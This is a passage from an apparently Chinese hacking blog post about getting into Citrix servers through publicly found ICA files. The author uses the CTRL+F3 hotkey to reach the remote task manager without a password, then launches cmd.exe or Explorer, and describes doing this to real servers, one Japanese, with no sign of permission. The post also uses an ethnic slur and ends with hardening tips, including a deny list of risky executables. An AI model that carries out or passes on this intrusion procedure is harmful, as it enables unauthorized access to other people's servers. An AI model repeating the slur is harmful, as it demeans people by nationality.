Citrix Presentation Server 客户端正确安装后，其默认打开后缀为ICA的文件，也可以直接单击网页中的ICA文件链接地址而打开Citrix链接提示框。在连接过程中会给出一些提 示，如果服务器、客户端以及参数相匹配，则会出现明显的登录警告等提示信息，如图4所示。
图4 出现登录提示警告信息
在测试过程中会有很多ICA文件是无效的或者说是过时的，有的虽然会出现一个连接提示信息，但由于协议不匹配的原因，最后将无法连接成功。还有一种情况通 过ICA文件可以连接，但需要连接方提供正确的用户名和密码，如图5所示，要求用户输入跟Windows登录类似的用户名和密码，只有输入正确的用户名和 密码后才能进入系统。
图5 Citrix中的用户和密码验证

（五）使用快捷键绕过密码验证
在连接上Citrix服务器后可以使用一些热键来进行常见的操作，一些常见的热键如下所示：
SHIFT+F1: 打开本地任务列表
SHIFT+F2: Toggle Title Bar
SHIFT+F3: 关闭远程应用程序
CTRL+F1: 显示Windows安全桌面相当于“Ctrl+Alt+Del”
CTRL+F2: 打开远程任务列表
CTRL+F3: 打开远程任务管理器，相当于本地热键“Ctrl+Shift+ESC”打开本地任务管理器。
ALT+MINUS: 相当于本地的“ALT+SHIFT+TAB”热键在各个任务之间切换
在Citrix服务器的某些版本存在密码绕过漏洞，通过热键直接调出任务管理器，从而绕过密码验证。即在出现确定的连接后，使用热键“CTRL+F3”打开远程的任务管理器，如图6所示，直接调出远程的任务管理器，呵呵，还是小日本的计算机呢！
图6 使用热键“CTRL+F3”打开远程计算机上的任务管理器
（六）进入远程Citrix服务器
前面的进入的日文的Citrix服务器，看不懂，后面换了一台英文版本的进行测试，如图7所示，通过热键“CTRL+F3”打开远程计算机上的任务管理 器，然后在任务管理器中“文件”－“新建任务”－“打开”，在其中输入“cmd.exe”或者“Explorer”直接打开命令提示符或者资源管理器，如 图7所示，通过运行“Explorer”进入对方计算机。
图7 通过新建任务进入远程Citrix服务器
（七）问题与探讨
1.修改参数失效。
在下载的ICA文件中有些通过修改参数InitialProgram的值顺利的进入远程服务器，但有些ICA文件在修改其值后，连接Citrix服务器后却要求输入用户名和密码才能进入。在没有获取用户名和密码的情况下基本无法进入。
2.具有执行程序权限，却很难提权
通过ICA文件连接使用热键绕过密码验证，虽然能够使用计算机中的资源，执行部分或者全部程序，但由于权限限制，如果登录的用户不是administrator权限，则服务器提权很难成功。有关Citrix的更多漏洞可以参考http://secunia.com/advisories/search/?search=citrix
3. Citrix服务器安全配置的一些方法
（1）首先正确配置NFuse/Citrix Secure Gateway；
（2）确定IIS/Apache已经打了最新补丁，并且在DMZ的保护中，或者使用NTLM认证；
（3）如果可能，要求远程用户使用SecureID认证方式；
（4）使用其它的浏览器取代IE；
（5）建立一个组，把所有Citrix用户放到这个组里面，禁止他们访问cmd.exe、ftp.exe、 tftp.exe、rcp.exe、net.exe、command.com、iexplorer.exe等可能对系统有危害的权限(在安全与应用的平衡 之间选择)；笔者曾经在一个老外的服务器上看见其权限做的非常严格，对每一个文件、文件夹都进行了仔细的审核，尤其是system权限，进行了严格的分 配。
（6）给你的Citrix打上最新的补丁；
（7）禁止winhelp32的访问，设置Internet选项禁止下载，禁止使用进程管理器；
（8）如果可能，设置Citrix Connection Configuration—>ica-tcp—>client settings—>选择必须为开。

--The End--

相关文章

• 2012年01月2日 -- How to attack a windows domain
• 2011年04月28日 -- 哈希注入工具wce
• 2010年07月17日 -- 渗透某大型内网入侵过程
• 2010年04月29日 -- 域环境下的渗透
• 2010年04月23日 -- 专业渗透人员在渗透过程中注意事项
• 2009年08月27日 -- Infiltrating a Botnet
• 2009年07月1日 -- web和数据库分离的渗透思路
• 2009年06月23日 -- 渗透,目的不单纯
• 2009年04月17日 -- 当渗透中实时检测管理员的bat
• 2007年03月13日 -- 入侵日本某官方Game